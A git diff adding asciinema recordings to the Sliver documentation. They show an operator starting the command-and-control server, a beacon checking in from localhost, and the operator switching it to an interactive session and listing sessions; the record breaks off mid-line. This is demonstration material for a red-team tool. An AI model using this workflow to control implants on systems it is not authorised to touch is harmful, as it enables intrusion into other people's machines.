+[53.76232, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[53.770592, "o", "\u001b[1m\u001b[32mexit\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[13D\u001b[9C\u001b[107D\u001b[13C\u001b[?25h"] +[54.915484, "o", "\u001b[13D\u001b[9C\u001b[6n"] +[54.931527, "o", "\u001b[107D\u001b[13C\u001b[0J\u001b[107D\r\r\n"] +[54.932852, "o", "\u001b[0 q\r\n"] +[54.948308, "o", "Exiting...\r\n"] +[54.99178, "o", "\u001b[?2004hroot@98df0494f659:~# "] +[56.165927, "o", "^C"] +[56.172389, "o", "\u001b[?2004l\r\u001b[?2004h\u001b[?2004l\r\r\n"] +[56.183662, "o", "\u001b[?2004hroot@98df0494f659:~# "] +[56.672344, "o", "\u001b[?2004l\r\r\n"] +[56.678369, "o", "exit\r\n"] diff --git a/docs/sliver-docs/public/asciinema/beacon_interractive.cast b/docs/sliver-docs/public/asciinema/beacon_interractive.cast new file mode 100644 index 0000000000..879e7017ab --- /dev/null +++ b/docs/sliver-docs/public/asciinema/beacon_interractive.cast @@ -0,0 +1,326 @@ +{"version": 2, "width": 107, "height": 52, "timestamp": 1714590264, "env": {"SHELL": "/bin/bash", "TERM": "screen"}} +[0.136132, "o", "\u001b[?2004h"] +[0.143774, "o", "root@98df0494f659:~# "] +[0.553882, "o", "."] +[0.600805, "o", "/"] +[0.786408, "o", "s"] +[0.920327, "o", "l,"] +[1.020856, "o", "i"] +[1.09121, "o", "v"] +[1.237796, "o", "e"] +[1.462542, "o", "\b\u001b[K"] +[1.608919, "o", "\b\u001b[K"] +[1.789658, "o", "\b\u001b[K"] +[1.964842, "o", "\b\u001b[K"] +[2.221513, "o", "i"] +[2.348423, "o", "v"] +[2.437752, "o", "e"] +[2.543392, "o", "r"] +[2.604143, "o", "-"] +[2.821617, "o", "s"] +[2.872165, "o", "e"] +[2.921024, "o", "r"] +[3.132354, "o", "v"] +[3.22335, "o", "e"] +[3.328553, "o", "r"] +[3.740231, "o", "\r\n"] +[3.741739, "o", "\u001b[?2004l\r"] +[4.820992, "o", "\u001b[1m\u001b[37m\r\r\n.------..------..------..------..------..------.\r\r\n|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |\r\r\n| :/\\: || :/\\: || (\\/) || :(): || (\\/) || :(): |\r\r\n| :\\/: || (__) || :\\/: || ()() || :\\/: || ()() |\r\r\n| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|\r\r\n`------'`------'`------'`------'`------'`------'\r\r\n\u001b[0m\r\n"] +[4.824064, "o", "All hackers gain miracle\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mServer v1.5.39 - 0b235b4d42d4eb75684825f5d5b30da71ec57d26 - \u001b[1mDirty\u001b[0m\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mWelcome to the sliver shell, please type 'help' for options\r\r\n\r\n"] +[4.851709, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[4.853842, "o", "\u001b[1 q"] +[4.855739, "o", "\u001b[?25l"] +[4.856263, "o", "\u001b[107D"] +[4.857824, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.860336, "o", "\u001b[0m\u001b[0K\u001b[49m"] +[4.861145, "o", "\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[9D\u001b[9C"] +[4.862185, "o", "\u001b[107D\u001b[9C\u001b[?25h"] +[8.911322, "o", "\u001b[9D\u001b[9C\u001b[107D"] +[8.911705, "o", "\u001b[0J\r\u001b[2K\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mBeacon df10fe87 CONTINUING_DOWNTOWN - 127.0.0.1:60516 (98df0494f659) - linux/amd64 - Wed, 01 May 2024 19:04:33 UTC\r\r\n\r\n\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[8.912258, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.91474, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[9D\u001b[9C\u001b[107D\u001b[9C\u001b[?25h"] +[10.377847, "o", "\u001b[?25l"] +[10.381083, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[10.390668, "o", "u\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[10.393864, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[10D\u001b[9C\u001b[107D\u001b[10C\u001b[?25h\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[10.395131, "o", "\u001b[6n"] +[10.400558, "o", "uy\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[11D\u001b[9C\u001b[107D\u001b[11C\u001b[?25h"] +[10.483651, "o", "\u001b[?25l"] +[10.486915, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[10.49085, "o", "uys\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[12D\u001b[9C\u001b[107D\u001b[12C\u001b[?25h"] +[10.946724, "o", "\u001b[?25l"] +[10.948094, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[10.951717, "o", "uy\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[11D\u001b[9C\u001b[107D\u001b[11C\u001b[?25h"] +[11.063725, "o", "\u001b[?25l"] +[11.064389, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.076724, "o", "u\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[11.077069, "o", "\u001b[107D\u001b[1A\u001b[10D\u001b[9C\u001b[107D\u001b[10C\u001b[?25h"] +[11.102311, "o", "\u001b[?25l"] +[11.103071, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.105707, "o", "us\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[11D\u001b[9C\u001b[107D\u001b[11C\u001b[?25h"] +[11.146745, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[11.146897, "o", "\u001b[6n"] +[11.149231, "o", "\u001b[1m\u001b[32muse\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[12D\u001b[9C\u001b[107D"] +[11.14994, "o", "\u001b[12C\u001b[?25h"] +[11.374809, "o", "\u001b[12D\u001b[9C"] +[11.376359, "o", "\u001b[6n"] +[11.379162, "o", "\u001b[107D\u001b[12C\u001b[0J\u001b[107D\r\r\n"] +[11.381221, "o", "\u001b[0 q\r\n"] +[11.405099, "o", "\u001b7\u001b[?25l"] +[11.406297, "o", "\u001b8"] +[11.407694, "o", "\u001b[0G\u001b[2K"] +[11.422757, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a session or beacon:\u001b[0m \u001b[0;36m[Use arrows to move, type to filter]\u001b[0m\r\n\u001b[0;1;36m> BEACON df10fe87 CONTINUING_DOWNTOWN 127.0.0.1:60516 98df0494f659 root linux/amd64\u001b[0m\r\n"] +[11.423641, "o", "\u001b7"] +[11.427229, "o", "\u001b[1A"] +[11.427338, "o", "\u001b[0G"] +[11.988908, "o", "\u001b8"] +[11.99021, "o", "\u001b[?25h\u001b8\u001b[0G"] +[11.998075, "o", "\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K"] +[12.000187, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a session or beacon:\u001b[0m\u001b[0;36m BEACON df10fe87 CONTINUING_DOWNTOWN 127.0.0.1:60516 98df0494f659 root linux/amd64\u001b[0m\r\n"] +[12.002379, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mActive beacon CONTINUING_DOWNTOWN (df10fe87-85a9-4957-bb8a-1fac6f46beee)\r\n"] +[12.050123, "o", "\r\n"] +[12.067053, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[12.069129, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[12.077063, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A"] +[12.077321, "o", "\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[14.803268, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[14.81619, "o", "i\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[14.816919, "o", "\u001b[1A\u001b[32D\u001b[31C\u001b[107D\u001b[32C\u001b[?25h"] +[14.863769, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[14.865055, "o", "\u001b[6n"] +[14.867546, "o", "in\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[14.867924, "o", "\u001b[107D\u001b[1A\u001b[33D\u001b[31C\u001b[107D\u001b[33C\u001b[?25h"] +[14.920156, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[14.923699, "o", "int\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[34D\u001b[31C\u001b[107D\u001b[34C\u001b[?25h"] +[15.016849, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[15.02499, "o", "inte\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[15.026144, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[35D\u001b[31C\u001b[107D\u001b[35C\u001b[?25h"] +[15.125867, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[15.135034, "o", "inter\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[15.136964, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[36D\u001b[31C\u001b[107D\u001b[36C\u001b[?25h"] +[15.30068, "o", "\u001b[1 q"] +[15.359274, "o", "\u001b[1 q"] +[15.361036, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[15.36373, "o", "\u001b[1m\u001b[32minteractive \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[15.364559, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[43D\u001b[31C\u001b[107D\u001b[43C\u001b[?25h"] +[16.281669, "o", "\u001b[43D\u001b[31C"] +[16.289447, "o", "\u001b[6n"] +[16.293013, "o", "\u001b[107D\u001b[43C\u001b[0J\u001b[107D\r\r\n"] +[16.294473, "o", "\u001b[0 q\r\n"] +[16.311327, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mUsing beacon's active C2 endpoint: https://localhost\r\n"] +[16.333966, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mTasked beacon CONTINUING_DOWNTOWN (97065184)\r\n"] +[16.334834, "o", "\r\n"] +[16.347152, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[16.347733, "o", "\u001b[1 q\u001b[?25l"] +[16.347906, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[16.349684, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D"] +[16.350076, "o", "\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[19.76795, "o", "\u001b[?25l\u001b[107D"] +[19.770371, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[19.77702, "o", "i\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[32D"] +[19.778475, "o", "\u001b[31C\u001b[107D\u001b[32C\u001b[?25h"] +[19.835542, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[19.838361, "o", "in\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[19.839131, "o", "\u001b[107D\u001b[1A\u001b[33D\u001b[31C\u001b[107D\u001b[33C\u001b[?25h"] +[19.974258, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[19.986342, "o", "inf\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[19.987375, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[34D\u001b[31C\u001b[107D\u001b[34C\u001b[?25h"] +[20.046116, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[20.051129, "o", "\u001b[1m\u001b[32minfo\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[20.05242, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[35D\u001b[31C\u001b[107D\u001b[35C\u001b[?25h"] +[20.247916, "o", "\u001b[35D\u001b[31C\u001b[6n"] +[20.259176, "o", "\u001b[107D\u001b[35C\u001b[0J\u001b[107D\r\r\n\u001b[0 q\r\n"] +[20.287182, "o", "\u001b[1m Beacon ID: \u001b[0mdf10fe87-85a9-4957-bb8a-1fac6f46beee\r\n"] +[20.287548, "o", "\u001b[1m Name: \u001b[0mCONTINUING_DOWNTOWN\r\n\u001b[1m Hostname: \u001b[0m98df0494f659\r\n\u001b[1m UUID: \u001b[0m3424b72e-e104-e99b-e183-dc60a7b751a0\r\n\u001b[1m Username: \u001b[0mroot\r\n\u001b[1m UID: \u001b[0m0\r\n\u001b[1m GID: \u001b[0m0\r\n\u001b[1m PID: \u001b[0m19304\r\n"] +[20.287807, "o", "\u001b[1m OS: \u001b[0mlinux\r\n\u001b[1m Version: \u001b[0mLinux 98df0494f659 5.10.76-linuxkit\r\n\u001b[1m Locale: \u001b[0m\r\n"] +[20.287876, "o", "\u001b[1m Arch: \u001b[0mamd64\r\n"] +[20.287932, "o", "\u001b[1m Active C2: \u001b[0mhttps://localhost\r\n"] +[20.288299, "o", "\u001b[1m Remote Address: \u001b[0m127.0.0.1:60516\r\n\u001b[1m Proxy URL: \u001b[0m\r\n"] +[20.290085, "o", "\u001b[1m Interval: \u001b[0m15s\r\n\u001b[1m Jitter: \u001b[0m30s\r\n\u001b[1m First Contact: \u001b[0mWed May 1 19:04:33 UTC 2024 (12s ago)\r\n\u001b[1m Last Checkin: \u001b[0mWed May 1 19:04:34 UTC 2024 (11s ago)\r\n"] +[20.29096, "o", "\u001b[1m Next Checkin: \u001b[0m\u001b[1m\u001b[32mWed May 1 19:05:04 UTC 2024 (in 19s)\u001b[0m\r\n"] +[20.29207, "o", "\r\n"] +[20.306548, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[20.30802, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[20.309864, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[49.886721, "o", "\u001b[31D\u001b[31C\u001b[107D\u001b[0J\r\u001b[2K\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mSession d761c1c5 CONTINUING_DOWNTOWN - 127.0.0.1:60532 (98df0494f659) - linux/amd64 - Wed, 01 May 2024 19:05:14 UTC\r\r\n\r\n\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[49.889466, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[49.889807, "o", "\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[53.019212, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[53.028493, "o", "b\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[53.030468, "o", "\u001b[107D\u001b[1A\u001b[32D\u001b[31C\u001b[107D\u001b[32C\u001b[?25h"] +[53.076648, "o", "\u001b[?25l"] +[53.077358, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[53.080118, "o", "ba\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[33D\u001b[31C\u001b[107D\u001b[33C\u001b[?25h"] +[53.206433, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[53.209767, "o", "bac\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[34D\u001b[31C\u001b[107D\u001b[34C\u001b[?25h"] +[53.273992, "o", "\u001b[?25l"] +[53.275967, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[53.279402, "o", "back\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[35D\u001b[31C\u001b[107D\u001b[35C\u001b[?25h"] +[53.432538, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[53.436394, "o", "backg\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[53.436558, "o", "\u001b[1A\u001b[36D\u001b[31C\u001b[107D\u001b[36C\u001b[?25h"] +[53.479687, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[53.483212, "o", "backgr\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[53.483611, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[37D\u001b[31C\u001b[107D\u001b[37C\u001b[?25h"] +[53.522649, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[53.523931, "o", "\u001b[6n"] +[53.526806, "o", "backgro\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[53.527532, "o", "\u001b[107D\u001b[1A\u001b[38D\u001b[31C\u001b[107D\u001b[38C\u001b[?25h"] +[53.632377, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[53.643176, "o", "backgrou\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[39D\u001b[31C\u001b[107D\u001b[39C\u001b[?25h"] +[53.721129, "o", "\u001b[?25l"] +[53.723732, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[53.731187, "o", "backgroun\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[53.732263, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[40D\u001b[31C\u001b[107D\u001b[40C\u001b[?25h"] +[54.10233, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[54.111554, "o", "\u001b[1m\u001b[32mbackground\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[41D\u001b[31C\u001b[107D\u001b[41C\u001b[?25h"] +[54.300203, "o", "\u001b[41D\u001b[31C\u001b[6n"] +[54.315441, "o", "\u001b[107D\u001b[41C\u001b[0J\u001b[107D\r\r\n\u001b[0 q\r\n"] +[54.346452, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mBackground ...\r\n"] +[54.347833, "o", "\r\n"] +[54.359048, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[54.359301, "o", "\u001b[1 q\u001b[?25l"] +[54.35975, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[54.361463, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[54.362218, "o", "\u001b[1A\u001b[9D\u001b[9C\u001b[107D\u001b[9C\u001b[?25h"] +[54.798195, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[54.813297, "o", "s\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[10D\u001b[9C\u001b[107D\u001b[10C\u001b[?25h"] +[54.888739, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[54.888945, "o", "\u001b[6n"] +[54.890465, "o", "se\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[54.890967, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[11D\u001b[9C\u001b[107D\u001b[11C\u001b[?25h"] +[55.057905, "o", "\u001b[?25l\u001b[107D"] +[55.059519, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[55.065726, "o", "ses\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[12D\u001b[9C\u001b[107D\u001b[12C\u001b[?25h"] +[55.270376, "o", "\u001b[1 q"] +[55.300588, "o", "\u001b[1 q"] +[55.300983, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[55.304519, "o", "\u001b[1m\u001b[32msessions \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[18D\u001b[9C\u001b[107D\u001b[18C\u001b[?25h"] +[55.508945, "o", "\u001b[18D\u001b[9C\u001b[6n"] +[55.520436, "o", "\u001b[107D\u001b[18C\u001b[0J\u001b[107D\r\r\n\u001b[0 q\r\n"] +[55.554794, "o", " ID Transport Remote Address Hostname Username Operating System Health \r\n========== =========== ================= ============== ========== ================== =========\r\n \u001b[0md761c1c5\u001b[0m \u001b[0mhttp(s)\u001b[0m \u001b[0m127.0.0.1:60532\u001b[0m \u001b[0m98df0494f659\u001b[0m \u001b[0mroot\u001b[0m \u001b[0mlinux/amd64\u001b[0m \u001b[1m\u001b[32m[ALIVE]\u001b[0m \r\n"] +[55.555094, "o", "\r\n"] +[55.566649, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[55.566788, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[55.568515, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[55.568938, "o", "\u001b[107D\u001b[1A\u001b[9D\u001b[9C\u001b[107D\u001b[9C\u001b[?25h"] +[56.05909, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[56.060174, "o", "\u001b[6n"] +[56.063406, "o", "u\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[56.064209, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[10D\u001b[9C\u001b[107D\u001b[10C\u001b[?25h"] +[56.173214, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[56.178309, "o", "us\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[11D\u001b[9C\u001b[107D\u001b[11C\u001b[?25h"] +[56.230544, "o", "\u001b[?25l"] +[56.231217, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[56.232528, "o", "\u001b[1m\u001b[32muse\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[12D\u001b[9C\u001b[107D\u001b[12C\u001b[?25h"] +[56.417403, "o", "\u001b[12D"] +[56.430372, "o", "\u001b[9C\u001b[6n"] +[56.433219, "o", "\u001b[107D\u001b[12C\u001b[0J\u001b[107D"] +[56.435212, "o", "\r\r\n\u001b[0 q\r\n"] +[56.457793, "o", "\u001b7\u001b[?25l\u001b8\u001b[0G\u001b[2K"] +[56.459779, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a session or beacon:\u001b[0m \u001b[0;36m[Use arrows to move, type to filter]\u001b[0m\r\n\u001b[0;1;36m> SESSION d761c1c5 CONTINUING_DOWNTOWN 127.0.0.1:60532 98df0494f659 root linux/amd64\u001b[0m\r\n\u001b[0;39m BEACON df10fe87 CONTINUING_DOWNTOWN 127.0.0.1:60516 98df0494f659 root linux/amd64\u001b[0m\r\n\u001b7"] +[56.460412, "o", "\u001b[1A"] +[56.461294, "o", "\u001b[0G\u001b[1A\u001b[0G"] +[57.368136, "o", "\u001b8"] +[57.369636, "o", "\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K"] +[57.372223, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a session or beacon:\u001b[0m \u001b[0;36m[Use arrows to move, type to filter]\u001b[0m\r\n\u001b[0;39m SESSION d761c1c5 CONTINUING_DOWNTOWN 127.0.0.1:60532 98df0494f659 root linux/amd64\u001b[0m\r\n\u001b[0;1;36m> BEACON df10fe87 CONTINUING_DOWNTOWN 127.0.0.1:60516 98df0494f659 root linux/amd64\u001b[0m\r\n\u001b7"] +[57.373112, "o", "\u001b[1A\u001b[0G"] +[57.709284, "o", "\u001b8\u001b[0G"] +[57.712666, "o", "\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K"] +[57.715117, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a session or beacon:\u001b[0m \u001b[0;36m[Use arrows to move, type to filter]\u001b[0m\r\n\u001b[0;1;36m> SESSION d761c1c5 CONTINUING_DOWNTOWN 127.0.0.1:60532 98df0494f659 root linux/amd64\u001b[0m\r\n\u001b[0;39m BEACON df10fe87 CONTINUING_DOWNTOWN 127.0.0.1:60516 98df0494f659 root linux/amd64\u001b[0m\r\n\u001b7\u001b[1A\u001b[0G\u001b[1A\u001b[0G"] +[58.046505, "o", "\u001b8\u001b[?25h\u001b8\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a session or beacon:\u001b[0m\u001b[0;36m SESSION d761c1c5 CONTINUING_DOWNTOWN 127.0.0.1:60532 98df0494f659 root 